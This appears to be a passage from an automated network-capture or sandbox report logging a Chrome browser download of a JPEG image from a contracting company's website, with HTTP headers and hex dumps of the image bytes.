                                              Data Ascii: JFIF''#*" "*#>1++1>H<9<HWNNWmhm''#*" "*#>1++1>H<9<HWNNWmhm"Y7YTN}Va}s
                                              2024-09-27 06:20:24 UTC8000INData Raw: 95 b8 5d 61 24 cd 49 bd 02 aa aa 2d cb 74 39 42 0b 6a a2 09 35 65 89 9d e9 8b 77 c7 9e 2b 4a 6e 8d 14 65 2a 22 11 50 d2 ea c9 26 5a b4 09 91 88 ad 69 bb 94 85 b6 4b 17 24 19 a8 4b 95 9b b7 46 59 25 a8 2c ba ba 33 38 f1 f4 77 2a db 99 98 c0 92 c2 c1 2c 92 c9 75 bb a6 62 4b 57 69 33 26 8b 6d da 17 52 ad f1 52 45 12 58 44 12 54 d7 4d c6 b7 24 c4 ba 46 ad dd 12 84 43 85 d6 32 ac cb 22 52 4d 12 26 b7 ac e2 5d eb 74 67 5a ba 96 e6 d4 a0 44 e0 bd 1c 33 60 90 9a 4b 28 c5 91 ab 35 23 7d fa 02 80 59 65 ca 5f 3c 93 5d dc 30 b2 4b 65 88 b2 5a b2 5a 91 d7 ae ec 15 42 c0 12 5f ff c4 00 19 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 08 01 03 10 00 00 00 f9 3f 6b 53 e3 96 2e b5 db ae 49 6e 8b 16 84 a8 29 32 d1 60 94 0b 3e 5b 52 dd 22 ef
                                              Data Ascii: ]a$I-t9Bj5ew+Jne*"P&ZiK$KFY%,38w*,ubKWi3&mRREXDTM$FC2"RM&]tgZD3`K(5#}Ye_<]0KeZZB_?kS.In)2`>[R"
                                              2024-09-27 06:20:25 UTC8000INData Raw: b9 e2 47 01 94 95 0e 81 88 7a 5d ed 25 79 41 54 7b 21 4d dc 23 b7 0b 6a b2 ab b0 6f 52 33 1c cd 04 a8 e7 cd a3 73 ca a1 cd 90 2c a5 72 c2 e5 46 ac 06 de 8d 78 9d 27 62 23 5e 37 f4 1f ff 00 82 f7 b5 8c 73 dd 3e 3a db fc b9 31 df fd 4d 8e b8 07 39 95 b8 84 d5 f4 a5 d2 8b dc 5b a5 ad 94 dd df 0d 99 ac 73 9c 16 19 ff 00 12 44 37 e1 74 77 59 d8 02 33 35 19 96 77 27 ca 3f 27 55 40 11 af 8f f1 38 83 cf b4 d4 ce 55 e4 7e 89 94 75 0e 4d a1 7d 9e 10 c3 1a 9b 87 c4 37 14 d0 8d b9 76 63 d0 1a ab 71 1b a6 ec 15 c2 ba ba b9 47 da e5 e5 1e 2e 36 69 5d 4b 94 6f 2e 07 8b af d8 9c fc 82 e5 af 0e 24 89 b4 79 b9 ba 80 92 10 f4 58 a9 9e d1 1b d5 9d ba 6c cd 76 d2 b9 ce 6b 42 05 c8 97 a3 75 95 64 67 0a c1 f2 c1 57 2a 88 1b bc f0 87 67 7d 49 7e ec 3e ab a0 8f ac ff 00 db 9e ba
                                              Data Ascii: Gz]%yAT{!M#joR3s,rFx'b#^7s>:1M9[sD7twY35w'?'U@8U~uM}7vcqG.6i]Ko.$yXlvkBudgW*g}I~>
                                              2024-09-27 06:20:25 UTC8000INData Raw: a9 60 72 76 1d 01 d9 d8 6b c7 b7 91 59 1e dc f9 c6 8f e6 c0 7d c3 a6 fc 7a 99 9a 6c c1 2d 5b bd d2 3b f6 cd d3 04 d6 ec 7d 35 63 b5 70 89 8c fb 85 b8 71 dd 91 c0 3e d7 f5 9e 0b 5f f9 ff 00 4e 37 64 b1 df b0 3a a5 de d3 15 49 f7 3a 38 87 be f4 8d d8 4a ef c1 f5 52 0f 7f 55 4e ef 7d e9 6d da 1d 2d fe 5c 62 bd c1 4d 45 5c e1 a9 a5 91 87 bd d2 d3 37 44 d9 24 71 f9 6c 6e 2c 4f 6b 59 8c 7e 41 f5 0d fb bd 5d 1b 07 79 c4 68 ce 8c e7 ca ff 00 b7 24 58 9b e3 2c 52 60 ef 6d ee fc 3a c5 74 4f d6 dd 15 4f 8c 28 47 1e 1d 14 52 0e 5b a4 e6 88 a9 9b 0d 33 60 6b a1 bd 4c 72 8a 78 df 4d 1b a3 66 23 8a e2 22 b6 50 1b 8d 62 21 37 f9 15 68 dd bf c8 47 f7 1b 8e 50 13 dd 87 56 51 d6 c8 59 0b 60 20 76 72 6b bf 17 43 5e 9d 0c 9f 9f 2e 26 ee 5f 48 d4 d9 63 fc 39 ef 09 d5 b6 dc d5
                                              Data Ascii: `rvkY}zl-[;}5cpq>_N7d:I:8JRUN}m-\bME\7D$qln,OkY~A]yh$X,R`m:tOO(GR[3`kLrxMf#"Pb!7hGPVQY` vrkC^.&_Hc9
                                              2024-09-27 06:20:25 UTC8000INData Raw: 07 bd 10 d3 fe 93 c1 70 b5 ee bb 62 c8 e1 86 8e b4 52 d9 78 28 ce 6c ad 79 97 82 77 ec fb 4f 1a 20 f8 a8 34 71 b4 10 56 94 37 63 7a 88 27 70 29 9a 17 39 fe f3 bd 02 8a 18 cb f1 3b 02 6f b2 85 63 88 eb bf e2 72 8c 21 b4 d4 42 6b 41 7b bd 37 a6 39 b0 49 ff 00 2a 19 a9 da 6f 40 b0 8b 20 09 69 6f c3 7a ca 61 88 77 64 d0 9d fd 4a 44 8b 18 df 34 ed 16 76 45 99 8d 70 54 1f 93 a9 47 72 a6 71 7a 3b 82 00 72 31 1d 06 03 a1 d5 d1 6b e9 3b 43 a5 09 c8 5f f9 03 b0 5e 55 1a 2c 60 b0 7d f3 19 04 2a 7d e5 94 ba 13 6f 70 35 3e a9 ee 73 05 e6 f5 93 31 8c c4 19 17 71 9a 8c e8 70 85 8d 68 29 b3 ec b0 53 8c d1 21 be ec 21 fd d1 43 d3 7d 8d 63 2c 1c 13 b4 cd d0 bd d1 b5 42 f6 d1 35 75 1a a2 fb 58 96 d7 a8 d4 c1 1a bd 67 8f d9 b7 d5 34 1e d3 ff 00 cb 6b 78 28 91 43 01 ac 47 f5
                                              Data Ascii: pbRx(lywO 4qV7cz'p)9;ocr!BkA{79I*o@ iozawdJD4vEpTGrqz;r1k;C_^U,`}*}op5>s1qph)S!!C}c,B5uXg4kx(CG
                                              2024-09-27 06:20:25 UTC8000INData Raw: 14 30 fd a8 32 78 69 53 c1 3a 18 68 bc 26 73 01 a1 d1 53 e0 9e 7b 93 9c 59 2b 26 9b 10 9d b6 28 67 ea 59 11 3b 89 0a 1b c4 ca 90 de 8b 7b d6 50 f0 dc 00 92 8d 18 fc eb 48 ed 72 67 79 50 fb d3 1a 82 25 0e 8d c7 8a 27 8a 6b 4e e0 54 18 7f 43 54 08 5f 40 50 c7 09 26 77 94 d3 c5 17 71 4f 7f 72 8a ee 0a 3f f2 a8 c3 e9 51 59 de 9f 0f bd 68 f1 4d fe 64 d3 f5 04 c7 a8 71 38 28 4f fa 53 0f d2 9a 38 26 b5 31 a9 9d e9 bd e9 ae e2 83 96 92 73 b8 27 1e 09 fd ca 20 e0 9e d4 f6 f1 52 e2 84 c6 d4 d3 65 c9 8e 92 d2 07 62 05 53 92 51 45 1c c4 72 42 6a 62 6a 08 67 9a 25 14 73 10 88 44 23 98 26 a0 82 1c 82 16 8f 14 07 15 0c a8 6e 52 fa 42 d1 fa 42 d1 fa 42 0c fa 02 0d fa 42 6b 38 2c 8c 0f 8a 7e 6d 50 a1 36 97 53 ff 00 20 a5 f4 4f ff 00 64 f9 1d 5f f4 13 62 3f 74 fc d3 5e df
                                              Data Ascii: 02xiS:h&sS{Y+&(gY;{PHrgyP%'kNTCT_@P&wqOr?QYhMdq8(OS8&1s' RebSQErBjbjg%sD#&nRBBBBk8,~mP6S Od_b?t^
                                              2024-09-27 06:20:25 UTC8000INData Raw: 66 12 a6 ae c9 f6 7e 17 d1 6a 77 8c 7f 07 5f 4c 0f a9 e4 87 e1 75 2d 97 f8 13 eb c3 7c 4a f5 7d 1f 43 d4 26 95 f1 35 2e b0 bb cc 19 af 58 12 a0 40 f4 34 81 88 10 25 4a 81 0f 4a 87 a5 7a 69 29 70 4d 57 d9 0b 6e 9f d4 d4 98 b5 93 15 40 34 b0 1e 02 b3 11 b1 95 91 c2 4b 0a 82 d2 80 c2 1a bd b3 08 14 80 58 1d 5f 48 2d 4c c3 d0 85 2c 5e 8d a7 21 db e5 07 0a c8 ba 22 67 5d aa 1f 99 a7 de 3d 95 d7 48 72 dc 93 31 71 56 d8 f0 97 2f 1b dd a5 14 86 91 f6 0c f8 11 f5 1c 0b 46 ec f1 48 98 bd 47 51 f0 d4 33 4e 95 7e 86 36 45 8e a5 bf be e5 fd a3 67 ff 00 06 ea 54 4a 9d bf ad 82 76 b9 d5 8e 1a b8 c5 31 d4 bc dd 25 62 1a b7 9f 4b af b1 18 b9 75 6b 9e 02 c3 34 b9 c6 36 9e ec 1f 9b e0 19 05 b1 7f 65 b5 6d 75 8e 80 4b 59 df 06 b1 93 2a 38 7e e5 c7 84 9d 52 b2 82 10 5b c1 09
                                              Data Ascii: f~jw_Lu-|J}C&5.X@4%JJzi)pMWn@4KX_H-L,^!"g]=Hr1qV/FHGQ3N~6EgTJv1%bKuk46emuKY*8~R[
                                              2024-09-27 06:20:25 UTC8000INData Raw: be e6 a6 1e 84 c5 9e bf 4f a9 27 f9 7a 25 6d f4 b9 70 7b 9f 44 c0 42 5f a0 ca 55 6c 38 bc c3 2c df 68 d7 03 f0 47 68 77 6f f9 15 b0 ec 07 d4 6b 52 b7 ab 3c 46 a9 0a 8d 5a a2 01 06 50 e2 99 ef 14 d0 f7 3f c4 b1 99 94 26 aa e6 0a 88 a5 58 72 84 76 3d 85 5e 63 73 4f dc 57 c5 c7 f8 a7 f8 81 3d a5 b0 01 85 ef 2e 2f b8 26 15 80 0e 0c 4a 21 ea 58 30 5c 65 ed d6 d5 86 b2 6a 8f 0c fa 66 83 d3 54 a9 78 5a a8 97 70 f6 96 53 c6 66 92 0b e8 fa d9 5e 8a 87 e2 4c 38 0e 1c 1e 84 c8 36 e3 f0 b6 56 2c 20 e8 5d 4c d7 5b 83 2d 5b b9 72 e0 c1 b9 6d ec 56 be b4 47 56 1f fc 00 57 e4 fe 6e d0 02 a5 a0 0e 63 60 cf f9 f9 5a bb 89 f3 59 1f d4 6e a6 5d ad 59 73 e1 a2 29 b4 85 e6 86 95 79 1c 47 d1 47 43 42 f6 21 08 d2 5b 93 b3 05 a8 b1 1d 11 78 52 11 58 12 89 a9 86 87 a7 c0 f4 8e de
                                              Data Ascii: O'z%mp{DB_Ul8,hGhwokR<FZP?&Xrv=^csOW=./&J!X0\ejfTxZpSf^L86V, ]L[-[rmVGVWnc`ZYn]Ys)yGGCB![xRX
                                              2024-09-27 06:20:25 UTC8000INData Raw: c9 4c 7b 31 e8 07 35 81 5b b1 a4 ac e6 e0 33 64 a4 72 ed d3 c6 b2 ca 14 d1 a7 f6 15 c8 2d 2a 9a 46 45 43 00 ac cc 85 10 65 c5 23 0d 0d de 34 6a d4 cb 50 e9 b8 c6 82 9a 36 f9 2a 55 90 5b 51 5d e1 45 56 c9 7d 64 03 8a d4 4e 86 96 c6 f2 c1 d5 62 6b 2e 97 39 b9 bc 19 88 a3 30 ba 3e 95 a9 5d 61 69 4c 0f 78 21 6a cc 43 69 f2 bb 1a 46 8a 70 d7 a1 ff 00 c9 72 77 86 3d 56 66 8b d6 05 23 91 2b 9f 04 1b 08 f9 25 4e 3b e2 d5 2b 89 7d 04 4a b2 bd f0 69 1e 27 4d 2d d4 2a 6f 4b 2a 54 14 7b 97 8a 99 4b b0 97 ec 56 3b dc 3a 10 01 b5 c9 e1 2a 53 71 4e e4 55 de d5 ec c6 3b 7c f8 63 bc 29 f0 b9 fe 67 10 73 13 5e 24 2b b2 c6 09 2c 84 5e 62 e0 0f b2 cd 75 84 3d 94 8d 24 a0 51 cd e9 0c 3a a1 7c 25 63 be 87 d9 86 8b 80 65 cc 41 6c 94 35 c4 c7 f2 ef 6b 23 79 1e eb 8e ad 4b d0 74
                                              Data Ascii: L{15[3dr-*FECe#4jP6*U[Q]EV}dNbk.90>]aiLx!jCiFprw=Vf#+%N;+}Ji'M-*oK*T{KV;:*SqNU;|c)gs^$+,^bu=$Q:|%ceAl5k#yKt
                                              2024-09-27 06:20:25 UTC8000INData Raw: 1a 85 2e f0 51 4c ce d1 6e ad 76 6b 50 ca b1 10 bb 4e 40 69 89 98 55 ea 6e 6a ac d4 3f b4 ab 74 7a ce d9 78 e6 e3 f0 c6 4d 17 8b d8 64 a7 a4 08 e6 b4 7e 5d c3 98 1d a9 41 d6 a9 2d 5b ad 02 7b 8e a8 fa ed 4c ff 00 71 62 79 62 d7 26 d4 65 f3 05 cc 4a 8b 14 e9 17 e9 01 a4 09 d6 a1 4b f6 8d 4d 81 87 82 59 7a 41 69 73 40 5d c8 1f 84 99 02 df 2a 1f 89 b1 fa 52 8d c8 5d 93 f9 11 af 9c 19 5f 0b ee 20 15 a1 cd ff 00 62 5a 5e d6 0b d2 5c 08 c1 36 8e 9a 43 4c 3d 9a c3 54 57 a9 d6 74 80 44 b5 81 87 5a 18 f4 bb 97 75 a5 7d d9 77 56 37 a9 9e 63 5c 10 4b 4d a2 aa 89 aa b7 f3 70 b1 a4 06 60 07 59 50 53 a5 c5 78 84 bb 91 35 29 c4 00 37 88 0d 98 45 5c 90 7a 97 dc 80 9c cb 66 fa 4d cf a8 83 4d 61 b4 38 e2 51 bb d8 88 51 6e 76 ab 66 c3 e0 cc a2 f6 3b 6b 2e 81 69 f7 00 59 48
                                              Data Ascii: .QLnvkPN@iUnj?tzxMd~]A-[{Lqbyb&eJKMYzAis@]*R]_ bZ^\6CL=TWtDZu}wV7c\KMp`YPSx5)7E\zfMMa8QQnvf;k.iYH


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              144192.168.2.465481173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:24 UTC714OUTGET /uploads/news/6/d7944471f1da95e5c78fcd38e3d0c93e.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/news
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:24 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:24 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 05:29:15 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 130131
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:24 UTC7930INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 01 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 ff c2 00 11 08 02 80 04 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 00 07 08 ff da 00 08 01 01 00 00 00 00 f5 7c 9e b3 35 e7 be 79 a2 f6 0d 26 5b 59 e3 5e 93 9e bf ce de d0 5f f9 bf 9a 2b d9 14 02 87 cf 73 ac a7 ab 77 77 77 42 f4 55
                                              Data Ascii: JFIF''#*" "*#>1++1>H<9<HWNNWmhm''#*" "*#>1++1>H<9<HWNNWmhm"|5y&[Y^_+swwwBU
                                              2024-09-27 06:20:24 UTC8000INData Raw: 59 0e 8e 12 ab b8 87 3e 66 94 30 65 44 d7 f3 23 91 cc 95 43 53 8e a5 42 87 8c e6 ba 06 94 30 f3 18 11 a3 cf 02 2c 8c 8b ac 2b 67 15 ed b6 40 5b 33 d6 09 85 90 8e 48 59 37 41 0d 87 73 1b 2c 0d 74 3d 34 53 1e 38 31 ca d8 4a 82 57 74 7d 3d 79 08 2b c9 e8 e5 6c 53 a7 46 d9 66 24 62 46 79 10 10 c8 8a 07 86 69 67 41 14 0f 90 98 38 19 49 8d e4 d7 b6 69 b9 e3 ca c9 e0 59 a0 6c 84 0c d8 65 8f 9b 3b 67 e0 7a 49 a4 70 eb 1a 9e 58 6b 17 31 b0 4c 92 c5 3c 5d 01 83 39 c9 33 51 ec 80 d1 e3 7c 16 b5 91 40 4b d9 33 52 68 20 9d 80 1a c8 9d 2a c4 ce b0 78 b2 4b 0b 6d ba 28 84 b2 02 5e 63 9b 0c f1 13 19 0d 5e e5 1e 56 cc 3a 39 f2 c4 c9 22 81 ec 34 74 57 b9 23 63 25 9e 36 94 a0 ce 93 48 31 10 11 18 f2 58 3e b2 19 e2 8d fd d2 b0 98 1b 21 03 c6 f6 48 de 57 c0 b3 8f 2b 51 bc 1f
                                              Data Ascii: Y>f0eD#CSB0,+g@[3HY7As,t=4S81JWt}=y+lSFf$bFyigA8IiYle;gzIpXk1L<]93Q|@K3Rh *xKm(^c^V:9"4tW#c%6H1X>!HW+Q
                                              2024-09-27 06:20:25 UTC8000INData Raw: dd 34 f7 78 70 a9 14 89 2a 07 5e e2 67 14 df c2 bb d0 ef a5 17 55 fb a8 fc d4 16 38 0b 6d c7 26 13 81 89 4e 11 b2 a7 2c e6 87 f4 1f e8 23 c5 a8 d4 87 fb 8c 50 a1 ff 00 c1 83 f2 03 fd b3 50 05 8d 1f f5 4d e2 31 5f 71 90 d2 ff 00 aa 03 6b a4 a9 79 96 43 44 7d 05 a8 06 67 8a a4 f7 63 52 8f b6 87 b0 a0 32 e6 a6 e1 d5 4a 8f a5 29 a3 53 2e 0a 8a c7 d1 a8 97 32 20 a6 f7 26 9b 3d b8 ea 41 f4 20 35 6d 93 24 75 79 fe 5c b4 3e c6 a4 1e 69 47 ee 34 72 11 29 73 87 a1 ec 3e 6d 52 7b d3 a6 ca b5 e9 8e 33 4b 03 93 c7 6e 4a 2b 28 f7 c4 f8 a8 f3 a8 cb fb 1a fc 51 6f 02 2a d7 ee e7 22 86 45 d7 35 ff 00 ee 7c bf fd b1 57 9f f2 17 b5 fc 4d 7c 38 7f f1 30 d2 7f 97 37 c9 3f 76 6a ea 7f f1 b7 d5 f0 c7 f8 f7 5f 2b 6f 69 7e 56 07 fb 3b 7a b9 38 82 43 4f 2b b7 50 54 0a a2 b4 cd 4a
                                              Data Ascii: 4xp*^gU8m&N,#PPM1_qkyCD}gcR2J)S.2 &=A 5m$uy\>iG4r)s>mR{3KnJ+(Qo*"E5|WM|807?vj_+oi~V;z8CO+PTJ
                                              2024-09-27 06:20:25 UTC8000INData Raw: d6 76 e9 e7 63 6b 30 9e 08 a5 1d c8 c7 15 61 75 17 61 98 fa b8 1b da 7b 9b 68 62 ee 49 77 d5 e2 64 02 0e e6 86 4c ce 15 9b 9b 4f 3b c9 14 a4 66 0b de f8 4b d9 f0 a6 9a 60 cf bb a5 f1 03 15 6f 78 af 20 8e 8e 3e 47 81 57 5d 46 2b 66 11 a3 cf 79 3d f4 b3 b4 de ae 5c aa 74 c8 25 8d c9 74 ff 00 74 15 4c 7c 8e 00 a2 c3 4a 7d 69 53 f2 63 1b ec d4 92 01 bb d3 87 77 59 4c 60 50 74 a8 1b e9 2d 75 e3 23 4d 6c 8b 76 08 b8 c3 7c 2c 08 bc 9e ba d7 3d 2a f2 9f e5 07 f2 a3 52 fb 52 12 0b 10 65 d5 71 46 07 9a 01 20 68 e1 56 2a 74 88 57 4c 68 c4 ae 7e 4d 90 8b 8d b1 cd 19 13 15 7f f5 2e a4 61 17 10 c6 2b 8a b6 c7 6b 35 8a c5 11 f9 f9 e2 82 d1 1f 2c 56 2b 14 ad ab 06 08 13 65 91 a4 8e e9 95 a2 59 bb 92 36 ad 66 ad 1c b1 c8 22 86 69 d4 49 42 d1 bd e4 16 89 3c b8 58 62 48 10
                                              Data Ascii: vck0aua{hbIwdLO;fK`ox >GW]F+fy=\t%ttL|J}iScwYL`Pt-u#Mlv|,=*RReqF hV*tWLh~M.a+k5,V+eY6f"iIB<XbH
                                              2024-09-27 06:20:25 UTC8000INData Raw: c9 e7 e2 63 a4 d6 cc 4d c7 3c 77 e4 fc ab 65 39 6d 4a b0 a8 d2 32 ab e9 e7 b1 ea 1d b2 44 5d 0f aa c8 01 a8 be 1c ec 8e e5 fc bd 4b a4 5a ff 00 81 75 d5 2f ef 06 b2 8b 22 96 16 ec 89 1d cc f2 90 b0 74 89 af e7 21 0a 74 4e 8a b8 ab de b7 7f 74 e7 58 a2 79 ee 54 55 9f 4e 47 8e 5d e7 ed ed fd bd b5 e5 bf 4f 85 a6 ab db db ab e7 de 68 7a 7d ec fa 08 ac be 18 b8 73 9b 88 c5 a5 b2 b6 92 4f 11 05 47 57 06 4e a5 28 4e 9d f0 fc ee 43 dd 5b 59 5a da 13 da ed bb c7 81 68 7b 28 c8 cf 35 bf e7 ac 74 c8 ef a5 8a 5b 7b 2e 97 0d 82 83 53 c6 f9 53 51 a7 66 3f 2b d4 8e f6 ee de de a2 50 b1 85 09 22 6b ca ba e0 1a b8 b4 8a 4f db 26 38 24 0a f3 97 68 4e 14 a6 8a 65 08 64 09 86 8b c7 9e be fa c2 12 a2 b7 96 53 88 ba 77 4f 82 ce 15 01 22 50 f7 34 f6 eb 30 04 f5 db 63 1c d0 91
                                              Data Ascii: cM<we9mJ2D]KZu/"t!tNtXyTUNG]Ohz}sOGWN(NC[YZh{(5t[{.SSQf?+P"kO&8$hNedSwO"P40c
                                              2024-09-27 06:20:25 UTC8000INData Raw: 07 55 12 11 85 a0 df 53 94 cf 91 a4 d4 72 09 d8 9c f7 7b 68 f9 59 37 51 5d a8 c1 f3 98 c5 1c 6a 02 2b 68 37 2d ee 8a 1b b4 c5 8b e5 87 8c bb 98 e3 db c9 63 e5 bb c2 05 35 10 90 91 52 ec 81 f7 07 9c 2e b2 6c 58 a4 b2 0e 2a 4e e1 1a d6 92 28 d8 ba c9 e2 64 58 e2 2d 84 93 08 09 64 1b ba 90 c2 24 76 cf a8 56 f6 18 60 43 08 cd 2e 53 22 83 2f 95 46 dc 62 84 99 db 45 c6 72 fb 26 af 94 6d c2 90 92 65 8e 1f b9 ae 69 17 24 64 0c f0 b2 60 36 a0 f9 d6 c1 fc 49 01 13 34 1a 2c 92 26 1c 19 1f 68 c8 d4 2f 6f 24 b1 bb 2e b8 6c 2b f0 30 a1 f5 66 74 0e 42 ab 0f ba b6 56 da 93 14 da 9a 3c 12 08 0a bb 1a d8 66 b5 40 82 97 8f 79 11 04 8d 59 d8 2e 77 0b f6 c8 c3 86 39 93 38 4c 1f c6 30 2b 07 18 25 ca 81 a3 17 7c 1a 61 e2 4d 45 27 6d 32 cd 26 48 21 52 41 8a d3 12 81 5e 39 24 97
                                              Data Ascii: USr{hY7Q]j+h7-c5R.lX*N(dX-d$vV`C.S"/FbEr&mei$d`6I4,&h/o$.l+0ftBV<f@yY.w98L0+%|aME'm2&H!RA^9$
                                              2024-09-27 06:20:25 UTC8000INData Raw: ed 0f f2 50 5e 0d 1d 15 56 9f 77 75 b2 63 cb 43 88 86 03 34 b5 88 4d 22 5b 07 35 d6 0b 5e 1d 84 e8 3a b4 c6 8a df 83 85 fe d5 ba e4 b3 92 31 2f 34 01 66 2c 73 c3 1e dd 21 df d7 dc 13 5c d1 bc a0 18 d9 eb 25 10 40 72 d1 d3 e1 ef ba 24 5d 57 99 d5 1b f2 e3 bf b9 ba 1d b2 7c 10 94 dc ae dc 2a b7 0d 92 46 92 80 03 95 11 3e ee e1 5a 64 f7 70 c4 2d 0d 8b 70 6c bd 8e da 69 aa 38 74 c3 60 ee 85 f8 71 0d 07 c5 30 78 a6 c1 0d 63 63 f9 40 08 44 95 60 85 9a 63 aa 73 5d 3f 15 22 64 4c 85 42 d3 4e e4 6e 13 85 30 9a 8d c3 7d 54 54 80 ad 9b d1 6e 9e 07 7a 74 88 b8 5f 95 3e 25 6c d1 e6 b5 c4 1e ab f3 1d ea b5 cc 7e de f6 cb e5 81 e0 17 e6 39 69 86 ee 1a 40 f0 1c 75 70 0b 47 47 85 16 a1 c7 cd 6a 00 f3 5f 99 c3 73 c3 f8 be cb f8 7d 38 7e 71 5f 95 c3 f8 17 3e 1b fb bf 0b 81
                                              Data Ascii: P^VwucC4M"[5^:1/4f,s!\%@r$]W|*F>Zdp-pli8t`q0xcc@D`cs]?"dLBNn0}TTnzt_>%l~9i@upGGj_s}8~q_>
                                              2024-09-27 06:20:25 UTC8000INData Raw: 57 a2 08 79 a6 b4 81 b8 58 0d 3d 0a c0 73 41 35 3b 2c 56 be bb ca c2 69 1d 21 61 94 e1 1d ff 00 65 94 f7 ac 17 46 f0 82 25 3b f7 01 45 f8 9f 77 78 f1 47 b9 33 2b b7 4f 24 73 aa df f7 1c f8 58 e8 b6 e3 f4 ad 5c be 91 c2 d3 ee 50 bc 1c 47 4f 2a d1 5f 83 8a 98 1b d5 44 c6 ab 17 28 d9 b4 44 9e 0f 06 1c 67 92 ae 6d 66 80 6e aa 2c be 60 63 81 82 16 5c f3 58 d7 8e a7 86 a3 8e 85 58 70 d3 8e df 65 7d b7 43 e6 6c 8e fd 56 af 22 dc 96 9c 2c 78 1f 8a dc 1b 47 33 c0 8f f9 58 e7 f9 4a 15 d5 13 46 12 04 9f 15 5f 80 a3 dc a8 11 84 ea 56 11 e0 d0 43 b5 f7 37 2a e9 dd cb ea f7 b4 63 7d 57 d6 d4 7f f1 0e 01 98 79 8d c0 8a f3 84 c6 82 e0 65 cd 34 74 6a 84 f7 26 9f 14 f8 4e 9f 34 c1 e8 81 6a c4 0a 50 4e 78 3d 57 f8 93 f3 34 cc 96 f6 49 ee 5e c4 ec 46 ef 82 e1 89 e5 75 8c ec
                                              Data Ascii: WyX=sA5;,Vi!aeF%;EwxG3+O$sX\PGO*_D(Dgmfn,`c\XXpe}ClV",xG3XJF_VC7*c}Wye4tj&N4jPNx=W4I^Fu
                                              2024-09-27 06:20:25 UTC8000INData Raw: 34 9b 85 35 34 d0 84 4c 83 4e 61 3c 41 d0 d0 a0 66 f5 84 e8 3a 85 88 02 36 05 da d9 4d 4c de 3c 56 6a f2 30 b4 12 9c 1c 4d 62 66 9c 91 88 14 db aa 68 71 06 6b 41 5d 53 49 91 71 5f 89 03 a5 0f f5 47 e3 ad 5d b2 8a c0 e4 80 39 7e 09 5d a7 86 d0 d4 80 11 1e 30 80 9d ef 0b 55 aa 3a 27 89 90 0c 98 be c9 f0 d6 88 cb 64 c9 73 6c 7e e1 39 d2 5d 30 0c 9a d7 33 96 1e 66 45 6b f6 08 e5 2e a0 70 16 d2 02 c1 98 a1 75 cf 44 fb 98 bd bc 13 a0 66 00 47 32 85 8c 9a a1 49 a4 88 93 de aa 26 26 e5 72 d1 66 26 b7 e4 b5 75 86 a8 c0 91 49 e6 81 b1 41 f4 f0 f3 4e f2 aa 7e 53 4e f4 e9 60 6c 52 7b ea b5 b2 68 cb 00 cd ca 6d 6d 10 a5 a6 7a 21 94 89 a8 a1 4d 2e 70 ac 11 42 45 94 bb 2c 84 d6 c5 fa 94 1a 64 69 36 2b e1 e9 ea a9 3a 54 a0 74 46 a1 18 00 78 a3 26 28 24 ea a4 26 13 51 5c
                                              Data Ascii: 454LNa<Af:6ML<Vj0MbfhqkA]SIq_G]9~]0U:'dsl~9]03fEk.puDfG2I&&rf&uIAN~SN`lR{hmmz!M.pBE,di6+:TtFx&($&Q\
                                              2024-09-27 06:20:25 UTC8000INData Raw: 4a af 25 14 2b 40 9d 45 48 31 65 5e 8a b5 e8 88 bd 46 a8 6b 45 45 59 d1 08 69 dd 36 7e e8 76 a7 5d 95 10 10 45 ee 89 91 aa 9c aa 30 da 4c 57 44 43 f2 95 2e 24 db 44 0f 78 4e ff 00 2e 89 c0 ab 26 e5 77 44 fa f5 59 67 74 68 68 53 85 78 18 52 48 4f 32 2e 0a 60 9d 74 41 d1 16 ba a7 45 55 ff c4 00 37 11 00 01 03 01 06 04 04 05 04 01 04 03 00 00 00 00 01 00 02 11 03 04 10 12 21 31 41 13 20 32 51 05 22 30 61 14 23 40 42 50 33 52 60 71 15 24 62 81 91 34 72 c1 ff da 00 08 01 02 01 01 3f 01 9c 94 e4 9d b2 6e eb 64 74 5b 28 10 8e 89 dd 3f 53 1f 43 4f ad aa d3 fa 9c 83 d0 a0 e2 e6 19 2b 64 53 77 5b 2d 96 cb 65 b2 76 9f 8a 69 82 0a aa f0 f7 48 e6 3c cc 10 32 42 51 41 4e 4a 54 e4 b6 5b 27 74 ad be a7 6f a7 3c d6 73 e5 37 14 2f d9 6c b6 47 45 b7 d3 01 cb 0a 3e 90 de 2f
